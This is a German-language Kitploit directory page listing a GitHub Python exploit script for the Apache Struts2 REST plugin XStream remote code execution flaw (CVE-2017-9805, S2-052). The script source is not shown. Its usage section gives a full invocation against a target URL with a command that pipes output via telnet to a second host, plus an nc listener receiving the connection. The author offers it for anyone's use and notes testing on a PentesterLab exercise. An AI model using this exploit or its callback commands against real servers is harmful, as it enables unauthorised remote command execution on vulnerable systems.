Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
-CVE-2017-9805 — Exploit-Skript für Apache Struts2 REST Plugin XStream RCE (‎CVE-2017-9805) | Kitploit
Tools/GitHubGitHub/0x00-0x00/-cve-2017-9805
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHub0x00-0x00/-cve-2017-9805

-CVE-2017-9805

Exploit-Skript für Apache Struts2 REST Plugin XStream RCE (‎CVE-2017-9805)

Repository anzeigen
1513vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Schwachstelleninformationen

Ressourcen: * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805

Was ist das?

Ein Python-Exploit-Skript, das in der Lage ist, Remote-Befehle in die Shell eines Systems auszuführen, das ein Struts2 mit der Schwachstelle S2-052 hostet.

Verwendung

╭─root@blackshell ~/
╰─# python s2-052.py --target 'http://192.168.0.233/orders/3' --command "echo pwned | telnet 192.168.0.122 1234"

root@kitploit:~
[*] Apache Struts XStream REST vulnerability - S2-052
[*] Creating payload ...
[*] Exploit packet has 2582 bytes.
[*] Sending exploit packet ...
[+] Exploit packet has been sent.

╭─zc00l@blackshell ~/
╰─$ nc -lvp 1234

root@kitploit:~
listening on [any] 1234 ...
connect to [192.168.0.122] from vulnerable.lan [192.168.0.233] 55791
pwned

Getestet auf der verwundbaren Pentesterlab-Maschine der Übung s2-052.

Autorenrechte

Dieses Exploit-Skript wurde von mir (zc00l) geschrieben und kann von jedermann verwendet werden.

Falls Sie dieses Skript verwenden oder modifizieren möchten, geben Sie bitte die rechtmäßigen Anerkennungen für bereits geleistete Arbeit.

Tool herunterladen